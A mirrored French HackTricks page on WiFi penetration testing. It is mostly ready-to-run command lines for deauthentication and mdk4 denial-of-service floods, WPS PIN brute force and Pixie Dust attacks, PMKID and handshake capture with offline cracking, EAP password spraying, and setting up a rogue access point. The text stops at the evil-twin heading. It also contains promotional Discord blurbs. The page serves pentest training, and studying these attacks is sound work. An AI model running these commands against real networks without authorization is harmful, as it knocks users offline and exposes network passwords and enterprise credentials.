Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 07:01:09 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/pentesting-wifi/README.md

56 KiB
Raw Blame History

Test d'intrusion Wifi

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge HackTricks AWS)!

Autres façons de soutenir HackTricks :

Rejoignez le serveur HackenProof Discord pour communiquer avec des pirates expérimentés et des chasseurs de primes !

Perspectives de piratage
Engagez-vous avec du contenu qui explore le frisson et les défis du piratage

Actualités de piratage en temps réel
Restez à jour avec le monde du piratage rapide grâce aux actualités et aux informations en temps réel

Dernières annonces
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme

Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs pirates dès aujourd'hui !

Commandes de base Wifi

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis

Outils

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

Airgeddon est un outil tout-en-un pour les tests de sécurité sans fil sur les réseaux Wi-Fi. Il combine de nombreuses attaques puissantes dans un seul outil, ce qui en fait un choix populaire parmi les testeurs de pénétration.

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Exécutez airgeddon avec docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

wifiphisher

Il peut effectuer des attaques Evil Twin, KARMA et Known Beacons, puis utiliser un modèle de phishing pour parvenir à obtenir le mot de passe réel du réseau ou capturer les identifiants des réseaux sociaux.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Cet outil automatise les attaques WPS/WEP/WPA-PSK. Il effectuera automatiquement :

  • Mettre l'interface en mode monitor
  • Scanner les réseaux possibles - Et vous permet de sélectionner la victime(s)
  • Si WEP - Lancer des attaques WEP
  • Si WPA-PSK
  • Si WPS : Attaque Pixie dust et attaque par force brute (soyez prudent, l'attaque par force brute pourrait prendre beaucoup de temps). Notez qu'il ne tente pas les PIN nuls ou les PIN générés par base de données.
  • Essayer de capturer le PMKID de l'AP pour le craquer
  • Essayer de déauthentifier les clients de l'AP pour capturer un handshake
  • Si PMKID ou Handshake, essayer de faire une attaque par force brute en utilisant les 5000 meilleurs mots de passe.

Résumé des attaques

  • DoS
  • Paquets de déauthentification/désassociation -- Déconnecter tout le monde (ou un ESSID/Client spécifique)
  • Faux AP aléatoires -- Cacher les réseaux, peut faire planter les scanners
  • Surcharge de l'AP -- Essayer de mettre l'AP hors service (généralement pas très utile)
  • WIDS -- Jouer avec l'IDS
  • TKIP, EAPOL -- Quelques attaques spécifiques pour DoS certains APs
  • Cracking
  • Cracker WEP (plusieurs outils et méthodes)
  • WPA-PSK
  • WPS pin "Brute-Force"
  • WPA PMKID bruteforce
  • [DoS +] Capture de WPA handshake + Cracking
  • WPA-MGT
  • Capture de Nom d'utilisateur
  • Bruteforce des identifiants
  • Jumeau maléfique (avec ou sans DoS)
  • Jumeau maléfique Ouvert [+ DoS] -- Utile pour capturer les identifiants du portail captif et/ou effectuer des attaques LAN
  • Jumeau maléfique WPA-PSK -- Utile pour les attaques réseau si vous connaissez le mot de passe
  • WPA-MGT -- Utile pour capturer les identifiants de l'entreprise
  • KARMA, MANA, Loud MANA, Balise connue
  • + Ouvert -- Utile pour capturer les identifiants du portail captif et/ou effectuer des attaques LAN
  • + WPA -- Utile pour capturer les handshakes WPA

DOS

Paquets de Déauthentification

La manière la plus courante de réaliser ce type d'attaque est avec des paquets de déauthentification. Il s'agit d'un type de trame "de gestion" responsable de déconnecter un appareil d'un point d'accès. La falsification de ces paquets est la clé pour pirater de nombreux réseaux Wi-Fi, car vous pouvez déconnecter de force n'importe quel client du réseau à tout moment. La facilité avec laquelle cela peut être fait est quelque peu effrayante et est souvent réalisée dans le cadre de la collecte d'un handshake WPA pour le craquage.

Outre l'utilisation momentanée de cette déconnexion pour collecter un handshake à craquer, vous pouvez également laisser ces déauths continuer, ce qui a pour effet de bombarder le client de paquets de déauth provenant apparemment du réseau auquel il est connecté. Comme ces trames ne sont pas chiffrées, de nombreux programmes exploitent les trames de gestion en les falsifiant et en les envoyant à un ou à tous les appareils d'un réseau.
Description provenant de ici.

Déauthentification en utilisant Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 signifie déauthentification
  • 1 est le nombre de déauthentifications à envoyer (vous pouvez en envoyer plusieurs si vous le souhaitez); 0 signifie les envoyer en continu
  • -a 00:14:6C:7E:40:80 est l'adresse MAC du point d'accès
  • -c 00:0F:B5:34:30:30 est l'adresse MAC du client à déauthentifier; si cela est omis, une déauthentification de diffusion est envoyée (ne fonctionne pas toujours)
  • ath0 est le nom de l'interface

Paquets de désassociation

Les paquets de désassociation sont un autre type de trame de gestion utilisée pour déconnecter un nœud (ce qui signifie tout appareil comme un ordinateur portable ou un téléphone portable) d'un point d'accès à proximité. La différence entre les trames de déauthentification et de désassociation réside principalement dans la manière dont elles sont utilisées.

Un point d'accès cherchant à déconnecter un appareil non autorisé enverrait un paquet de déauthentification pour informer l'appareil qu'il a été déconnecté du réseau, tandis qu'un paquet de désassociation est utilisé pour déconnecter tous les nœuds lorsque le point d'accès est mis hors tension, redémarré ou quitte la zone.

Description provenant de ici.

Cette attaque peut être effectuée par mdk4(mode "d"):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Plus d'attaques DOS par mdk4

De ici.

MODE D'ATTAQUE b: Inondation de balises

Envoie des trames de balises pour afficher de faux AP aux clients. Cela peut parfois faire planter des scanners réseau et même des pilotes!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

MODE D'ATTAQUE a: Déni de service d'authentification

Envoie des trames d'authentification à tous les AP trouvés dans la plage. Trop de clients peuvent bloquer ou réinitialiser plusieurs AP.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

MODE D'ATTAQUE p: Exploration et Bruteforcing de SSID

Sonde les AP et vérifie les réponses, utile pour vérifier si le SSID a été correctement démasqué et si l'AP est dans votre plage d'envoi. Le Bruteforcing des SSID cachés avec ou sans liste de mots est également disponible.

MODE D'ATTAQUE m: Exploitation des Contremesures de Michael

Envoie des paquets aléatoires ou réinjecte des doublons sur une autre file QoS pour provoquer les Contremesures de Michael sur les AP TKIP. L'AP se mettra alors hors service pendant une minute entière, ce qui en fait un DoS efficace.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

MODE D'ATTAQUE e: Injection de paquets EAPOL Start et Logoff

Inonde un point d'accès avec des trames de démarrage EAPOL pour le maintenir occupé avec des sessions fictives et ainsi l'empêcher de gérer des clients légitimes. Ou déconnecte les clients en injectant des messages de déconnexion EAPOL fictifs.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

MODE D'ATTAQUE s : Attaques pour les réseaux maillés IEEE 802.11s

Diverses attaques sur la gestion des liens et des routages dans les réseaux maillés. Inonder les voisins et les routes, créer des trous noirs et détourner le trafic !

MODE D'ATTAQUE w : Confusion WIDS

Confondre/Abuser les Systèmes de Détection et de Prévention des Intrusions en connectant les clients à plusieurs nœuds WDS ou à de faux points d'accès malveillants.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

MODE D'ATTAQUE f: Packet Fuzzer

Un simple packet fuzzer avec plusieurs sources de paquets et un bel ensemble de modificateurs. Soyez prudent !

Airggedon

Airgeddon propose la plupart des attaques proposées dans les commentaires précédents :

WPS

WPS signifie Wi-Fi Protected Setup. Il s'agit d'une norme de sécurité des réseaux sans fil qui tente de rendre les connexions entre un routeur et des appareils sans fil plus rapides et plus faciles. WPS fonctionne uniquement pour les réseaux sans fil qui utilisent un mot de passe crypté avec les protocoles de sécurité WPA Personnel ou WPA2 Personnel. WPS ne fonctionne pas sur les réseaux sans fil qui utilisent la sécurité WEP obsolète, qui peut être facilement craquée par n'importe quel hacker avec un ensemble de outils et compétences de base. (De ici)

WPS utilise un PIN de 8 chiffres pour permettre à un utilisateur de se connecter au réseau, mais les 4 premiers chiffres sont d'abord vérifiés, puis les 4 suivants. Ensuite, il est possible de Brute-Force la première moitié puis la seconde moitié (seulement 11000 possibilités).

Brute Force WPS

Il existe 2 principaux outils pour effectuer cette action : Reaver et Bully.

  • Reaver a été conçu pour être une attaque robuste et pratique contre WPS, et a été testé contre une grande variété de points d'accès et d'implémentations WPS.
  • Bully est une nouvelle implémentation de l'attaque par force brute WPS, écrite en C. Il présente plusieurs avantages par rapport au code reaver original : moins de dépendances, amélioration des performances mémoire et CPU, gestion correcte de l'endianness et un ensemble d'options plus robuste.

Cette attaque exploite une faiblesse dans le code PIN WPS à huit chiffres ; en raison de ce problème, le protocole divulgue des informations sur les quatre premiers chiffres du PIN, et le dernier chiffre sert de somme de contrôle, ce qui facilite le brute forcing de l'AP WPS.
Notez que certains appareils incluent des protections contre les attaques par force brute, qui bloquent généralement les adresses MAC qui tentent de manière répétée d'attaquer. Dans ce cas, la complexité de cette attaque augmente, car vous devriez faire tourner les adresses MAC tout en testant les PIN.

Si le code WPS valide est trouvé, à la fois Bully et Reaver l'utiliseront pour découvrir la clé WPA/WPA2 PSK utilisée pour protéger le réseau, vous pourrez donc vous connecter à tout moment où vous en avez besoin.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Brute force intelligent

Au lieu de commencer à essayer chaque PIN possible, vous devriez vérifier s'il existe des PINs découverts pour l'AP que vous attaquez (en fonction du MAC du fabricant) et les PINs générés par le logiciel PIN.

  • La base de données des PINs connus est conçue pour les Points d'Accès de certains fabricants pour lesquels il est connu qu'ils utilisent les mêmes PINs WPS. Cette base de données contient les trois premiers octets des adresses MAC et une liste de PINs correspondants très probables pour ce fabricant.
  • Il existe plusieurs algorithmes pour générer des PINs WPS. Par exemple, ComputePIN et EasyBox utilisent l'adresse MAC du Point d'Accès dans leurs calculs. Mais l'algorithme Arcadyan nécessite également un ID de périphérique.

Attaque WPS Pixie Dust

Dominique Bongard a découvert que certains AP ont des moyens faibles de générer des nonces (connus sous le nom de E-S1 et E-S2) qui sont censés être secrets. Si nous sommes capables de découvrir ce que sont ces nonces, nous pouvons facilement trouver le PIN WPS d'un AP puisque l'AP doit nous le donner dans un hash pour prouver qu'il connaît également le PIN, et que le client ne se connecte pas à un AP malveillant. Ces E-S1 et E-S2 sont essentiellement les "clés pour déverrouiller la boîte de verrouillage" contenant le PIN WPS. Plus d'informations ici: https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)

Essentiellement, certaines implémentations ont échoué dans l'utilisation de clés aléatoires pour chiffrer les 2 parties du PIN (comme il est décomposé en 2 parties pendant la communication d'authentification et envoyé au client), donc une attaque hors ligne pourrait être utilisée pour forcer le PIN valide.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Attaque de code PIN nul

Certaines implémentations vraiment mauvaises autorisent la connexion avec un code PIN nul (très étrange aussi). Reaver peut tester cela (Bully ne le peut pas).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Toutes les attaques WPS proposées peuvent être facilement effectuées en utilisant airgeddon.

  • 5 et 6 vous permettent d'essayer votre PIN personnalisé (si vous en avez un)
  • 7 et 8 effectuent l'attaque Pixie Dust
  • 13 vous permet de tester le PIN NULL
  • 11 et 12 vont récupérer les PIN liés à l'AP sélectionné à partir des bases de données disponibles et générer des PIN possibles en utilisant : ComputePIN, EasyBox et éventuellement Arcadyan (recommandé, pourquoi pas ?)
  • 9 et 10 testeront chaque PIN possible

WEP

Tellement obsolète et disparu que je ne vais pas en parler. Sachez simplement que airgeddon a une option WEP appelée "All-in-One" pour attaquer ce type de protection. Plusieurs outils offrent des options similaires.

Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de primes en bugs !

Perspicacité en piratage
Engagez-vous avec du contenu qui explore le frisson et les défis du piratage

Actualités de piratage en temps réel
Restez à jour avec le monde du piratage en évolution rapide grâce aux actualités et aux informations en temps réel

Dernières annonces
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme

Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !

WPA/WPA2 PSK

PMKID

En 2018, les auteurs de hashcat ont révélé un nouveau type d'attaque qui ne repose pas seulement sur un seul paquet, mais qui ne nécessite pas que des clients soient connectés à notre AP cible, mais seulement une communication entre l'attaquant et l'AP.

Il s'avère que beaucoup de routeurs modernes ajoutent un champ optionnel à la fin de la première trame EAPOL envoyée par l'AP lui-même lorsque quelqu'un s'associe, le soi-disant Robust Security Network, qui inclut quelque chose appelé PMKID

Comme expliqué dans le message original, le PMKID est dérivé en utilisant des données qui nous sont connues:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Étant donné que la chaîne "Nom PMK" est constante, nous connaissons à la fois le BSSID de l'AP et de la station et le PMK est le même que celui obtenu à partir d'une poignée de main complète en 4 étapes, c'est tout ce dont hashcat a besoin pour craquer la PSK et récupérer la phrase secrète!
Description obtenue à partir de ici.

Pour collecter ces informations et forcer localement le mot de passe, vous pouvez faire :

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Les PMKIDs capturés seront affichés dans la console et également enregistrés dans _/tmp/attack.pcap_
Maintenant, convertissez la capture au format hashcat/john et cassez-le :

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Veuillez noter que le format correct d'un hachage contient 4 parties, comme : 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7*566f6461666f6e65436f6e6e6563743034383131343838
__Si le vôtre ne contient que 3 parties, alors il est invalide (la capture PMKID n'était pas valide).

Notez que hcxdumptool capture également les poignées de main (quelque chose comme ceci apparaîtra : MP:M1M2 RC:63258 EAPOLTIME:17091). Vous pouvez transformer les poignées de main au format hashcat/john en utilisant cap2hccapx.

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

J'ai remarqué que certaines poignées de main capturées avec cet outil ne pouvaient pas être craquées même en connaissant le mot de passe correct. Je recommanderais de capturer les poignées de main également de manière traditionnelle si possible, ou de capturer plusieurs d'entre elles en utilisant cet outil.

Capture de poignée de main

Une façon d'attaquer les réseaux WPA/WPA2 est de capturer une poignée de main et d'essayer de craquer le mot de passe utilisé hors ligne. Pour ce faire, vous devez trouver le BSSID et le canal du réseau de la victime, ainsi qu'un client connecté au réseau.
Une fois que vous avez ces informations, vous devez commencer à écouter toutes les communications de ce BSSID dans ce canal, car la poignée de main sera probablement envoyée là-bas:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

Maintenant, vous devez déauthentifier le client pendant quelques secondes afin qu'il se réauthentifie automatiquement sur le point d'accès (veuillez lire la partie sur le DoS pour trouver plusieurs façons de déauthentifier un client) :

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, not always work

Notez que lorsque le client a été désauthentifié, il pourrait essayer de se connecter à un autre point d'accès ou, dans d'autres cas, à un réseau différent.

Une fois que le airodump-ng affiche des informations de poignée de main, cela signifie que la poignée de main a été capturée et vous pouvez arrêter d'écouter :

Une fois la poignée de main capturée, vous pouvez la cracker avec aircrack-ng :

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Vérifier si le handshake est présent dans le fichier

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Si cet outil trouve un handshake incomplet d'un ESSID avant le complet, il ne détectera pas le valide.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

Il est important de parler des différentes méthodes d'authentification qui pourraient être utilisées par un Wifi d'entreprise. Pour ce type de Wifi, vous trouverez probablement dans airodump-ng quelque chose comme ceci :

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

EAP (Extensible Authentication Protocol) est le crâne de la communication d'authentification, au-dessus de cela, un algorithme d'authentification est utilisé par le serveur pour authentifier le client (supplicant) et dans certains cas par le client pour authentifier le serveur.
Principaux algorithmes d'authentification utilisés dans ce cas :

  • EAP-GTC: Est une méthode EAP pour prendre en charge l'utilisation de jetons matériels et de mots de passe à usage unique avec EAP-PEAP. Son implémentation est similaire à MSCHAPv2, mais n'utilise pas de défi pair. Au lieu de cela, les mots de passe sont envoyés au point d'accès en texte brut (très intéressant pour les attaques de rétrogradation).
  • EAP-MD-5 (Message Digest): Le client envoie le hachage MD5 du mot de passe. Non recommandé : Vulnérable aux attaques par dictionnaire, pas d'authentification du serveur et pas de moyen de générer des clés de confidentialité équivalentes au câble (WEP) par session.
  • EAP-TLS (Transport Layer Security): Il repose sur des certificats côté client et côté serveur pour effectuer l'authentification et peut être utilisé pour générer dynamiquement des clés WEP basées sur l'utilisateur et la session pour sécuriser les communications ultérieures.
  • EAP-TTLS (Tunneled Transport Layer Security): Authentification mutuelle du client et du réseau à travers un canal (ou tunnel) chiffré, ainsi qu'un moyen de dériver des clés WEP dynamiques, par utilisateur et par session. Contrairement à EAP-TLS, EAP-TTLS ne nécessite que des certificats côté serveur (le client utilisera des identifiants).
  • PEAP (Protected Extensible Authentication Protocol): PEAP est comme le protocole EAP mais crée un tunnel TLS pour protéger la communication. Ensuite, des protocoles d'authentification faibles peuvent être utilisés au-dessus d'EAP car ils seront protégés par le tunnel.
  • PEAP-MSCHAPv2: C'est aussi connu sous le nom de PEAP car il est largement adopté. Il s'agit simplement du challenge/réponse vulnérable appelé MSCHAPv2 sur PEAP (il est protégé par le tunnel TLS).
  • PEAP-EAP-TLS ou simplement PEAP-TLS: Est très similaire à EAP-TLS mais un tunnel TLS est créé avant l'échange des certificats.

Vous pouvez trouver plus d'informations sur ces méthodes d'authentification ici et ici.

Capture de nom d'utilisateur

En lisant https://tools.ietf.org/html/rfc3748#page-27, il semble que si vous utilisez EAP, les messages "Identité" doivent être pris en charge, et le nom d'utilisateur sera envoyé en clair dans les messages "Réponse Identité".

Même en utilisant l'une des méthodes d'authentification les plus sécurisées : PEAP-EAP-TLS, il est possible de capturer le nom d'utilisateur envoyé dans le protocole EAP. Pour ce faire, capturez une communication d'authentification (démarrez airodump-ng sur un canal et wireshark sur la même interface) et filtrez les paquets par eapol.
Dans le paquet "Réponse, Identité", le nom d'utilisateur du client apparaîtra.

Identités anonymes

La dissimulation de l'identité est prise en charge à la fois par EAP-PEAP et EAP-TTLS. Dans le contexte d'un réseau WiFi, une demande d'identité EAP est généralement initiée par le point d'accès (AP) pendant le processus d'association. Pour garantir la protection de l'anonymat de l'utilisateur, la réponse du client EAP sur l'appareil de l'utilisateur ne contient que les informations essentielles requises pour que le serveur RADIUS initial traite la demande. Ce concept est illustré à travers les scénarios suivants :

  • EAP-Identité = anonyme
  • Dans ce scénario, tous les utilisateurs utilisent le pseudonyme "anonyme" comme identifiant d'utilisateur. Le serveur RADIUS initial fonctionne soit comme un serveur EAP-PEAP ou EAP-TTLS, chargé de gérer le côté serveur du protocole PEAP ou TTLS. La méthode d'authentification interne (protégée) est ensuite soit gérée localement, soit déléguée à un serveur RADIUS distant (domicile).
  • EAP-Identité = anonyme@realm_x

  • Dans cette situation, les utilisateurs de différents domaines dissimulent leurs identités tout en indiquant leurs domaines respectifs. Cela permet au serveur RADIUS initial de transmettre les demandes EAP-PEAP ou EAP-TTLS aux serveurs RADIUS dans leurs domaines d'origine, qui agissent en tant que serveur PEAP ou TTLS. Le serveur RADIUS initial agit uniquement en tant que nœud relais RADIUS.

  • Alternativement, le serveur RADIUS initial peut fonctionner en tant que serveur EAP-PEAP ou EAP-TTLS et gérer la méthode d'authentification protégée ou la transférer à un autre serveur. Cette option facilite la configuration de politiques distinctes pour différents domaines.

En EAP-PEAP, une fois que le tunnel TLS est établi entre le serveur PEAP et le client PEAP, le serveur PEAP initie une demande d'identité EAP et la transmet à travers le tunnel TLS. Le client répond à cette deuxième demande d'identité EAP en envoyant une réponse d'identité EAP contenant la véritable identité de l'utilisateur à travers le tunnel chiffré. Cette approche empêche efficacement la révélation de l'identité réelle de l'utilisateur à toute personne écoutant le trafic 802.11.

EAP-TTLS suit une procédure légèrement différente. Avec EAP-TTLS, le client s'authentifie généralement en utilisant PAP ou CHAP, sécurisé par le tunnel TLS. Dans ce cas, le client inclut un attribut Nom d'utilisateur et soit un attribut Mot de passe, soit un attribut CHAP-Mot de passe dans le message TLS initial envoyé après l'établissement du tunnel.

Peu importe le protocole choisi, le serveur PEAP/TTLS obtient connaissance de la véritable identité de l'utilisateur une fois que le tunnel TLS a été établi. La véritable identité peut être représentée sous la forme utilisateur@domaine ou simplement utilisateur. Si le serveur PEAP/TTLS est également responsable de l'authentification de l'utilisateur, il possède désormais l'identité de l'utilisateur et procède à la méthode d'authentification protégée par le tunnel TLS. Alternativement, le serveur PEAP/TTLS peut transmettre une nouvelle demande RADIUS au serveur RADIUS d'origine de l'utilisateur. Cette nouvelle demande RADIUS exclut la couche de protocole PEAP ou TTLS. Dans les cas où la méthode d'authentification protégée est EAP, les messages EAP internes sont transmis au serveur RADIUS d'origine sans l'enveloppe EAP-PEAP ou EAP-TTLS. L'attribut Nom d'utilisateur du message RADIUS sortant contient la véritable identité de l'utilisateur, remplaçant le Nom d'utilisateur anonyme du message RADIUS entrant. Lorsque la méthode d'authentification protégée est PAP ou CHAP (prise en charge uniquement par TTLS), les attributs Nom d'utilisateur et autres attributs d'authentification extraits de la charge utile TLS sont substitués dans le message RADIUS sortant, remplaçant le Nom d'utilisateur anonyme et les attributs EAP-Message TTLS trouvés dans la demande RADIUS entrante.

Pour plus d'informations, consultez https://www.interlinknetworks.com/app_notes/eap-peap.htm

EAP-Bruteforce (password spray)

Si le client est censé utiliser un nom d'utilisateur et un mot de passe (remarquez que EAP-TLS ne sera pas valide dans ce cas), alors vous pourriez essayer d'obtenir une liste de noms d'utilisateur (voir la prochaine partie) et de mots de passe et essayer de forcer l'accès en utilisant air-hammer.

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

Vous pourriez également effectuer cette attaque en utilisant eaphammer :

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Théorie des attaques client

Sélection du réseau et itinérance

Bien que le protocole 802.11 ait des règles très spécifiques qui dictent comment une station peut rejoindre un ESS, il ne spécifie pas comment la station devrait sélectionner un ESS auquel se connecter. De plus, le protocole permet aux stations de se déplacer librement entre les points d'accès partageant le même ESSID (car vous ne voudriez pas perdre la connectivité WiFi en vous déplaçant d'une extrémité à l'autre d'un bâtiment, etc). Cependant, le protocole 802.11 ne spécifie pas comment ces points d'accès devraient être sélectionnés. De plus, même si les stations doivent s'authentifier auprès de l'ESS pour s'associer à un point d'accès, le protocole 802.11 ne nécessite pas que le point d'accès soit authentifié auprès de la station.

Listes de réseaux préférés (PNL)

Chaque fois qu'une station se connecte à un réseau sans fil, l'ESSID du réseau est stocké dans la liste de réseaux préférés (PNL) de la station. La PNL est une liste ordonnée de tous les réseaux auxquels la station s'est connectée dans le passé, et chaque entrée dans la PNL contient l'ESSID du réseau et toute information de configuration spécifique au réseau nécessaire pour établir une connexion.

Balayage passif

Dans les réseaux d'infrastructure, les points d'accès transmettent périodiquement des trames de balise pour annoncer leur présence et leurs capacités aux stations à proximité. Les balises sont des trames diffusées, ce qui signifie qu'elles sont destinées à être reçues par toutes les stations à proximité dans la portée. Les balises incluent des informations sur les taux pris en charge par l'AP, les capacités de chiffrement, des informations supplémentaires, et surtout, les trames de balise contiennent l'ESSID de l'AP (tant que la diffusion de l'ESSID n'est pas désactivée).

Pendant le balayage passif, le périphérique client écoute les trames de balise des points d'accès à proximité. Si le périphérique client reçoit une trame de balise dont le champ ESSID correspond à un ESSID de la PNL du client, le client se connectera automatiquement au point d'accès qui a envoyé la trame de balise. Ensuite, supposons que nous voulions cibler un périphérique sans fil qui n'est pas actuellement connecté à un réseau sans fil. Si nous connaissons au moins une entrée dans la PNL de ce client, nous pouvons forcer le client à se connecter à nous simplement en créant notre propre point d'accès avec l'ESSID de cette entrée.

Exploration active

Le deuxième algorithme de sélection de réseau utilisé dans le 802.11 est connu sous le nom d'exploration active. Les périphériques clients qui utilisent l'exploration active transmettent continuellement des trames de demande de sondage pour déterminer quels AP sont à portée, ainsi que quelles sont leurs capacités. Les demandes de sondage se présentent sous deux formes : dirigées et diffusées. Les demandes de sondage dirigées sont adressées à un ESSID spécifique, et c'est la manière pour le client de vérifier si un réseau spécifique est à proximité.

Les clients qui utilisent l'exploration dirigée enverront des demandes de sondage pour chaque réseau de leur PNL. Il convient de noter que l'exploration dirigée est la seule façon d'identifier la présence de réseaux cachés à proximité. Les demandes de sondage diffusées fonctionnent presque exactement de la même manière, mais sont envoyées avec le champ SSID défini sur NULL. Cela adresse la demande de sondage diffusée à tous les points d'accès à proximité, permettant à la station de vérifier si l'un de ses réseaux préférés est à proximité sans révéler le contenu de sa PNL.

Simple AP avec redirection vers Internet

Avant d'expliquer comment effectuer des attaques plus complexes, il va être expliqué comment simplement créer un AP et rediriger son trafic vers une interface connectée à Internet.

En utilisant ifconfig -a, vérifiez que l'interface wlan pour créer l'AP et l'interface connectée à Internet sont présentes.

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

Créez un fichier de configuration /etc/dnsmasq.conf comme suit :

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Ensuite, définissez les adresses IP et les routes :

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Et ensuite démarrer dnsmasq :

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

Créez un fichier de configuration hostapd.conf:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Arrêtez les processus gênants, activez le mode monitor, et démarrez hostapd:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Redirection et Renvoi

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Jumeau Maléfique

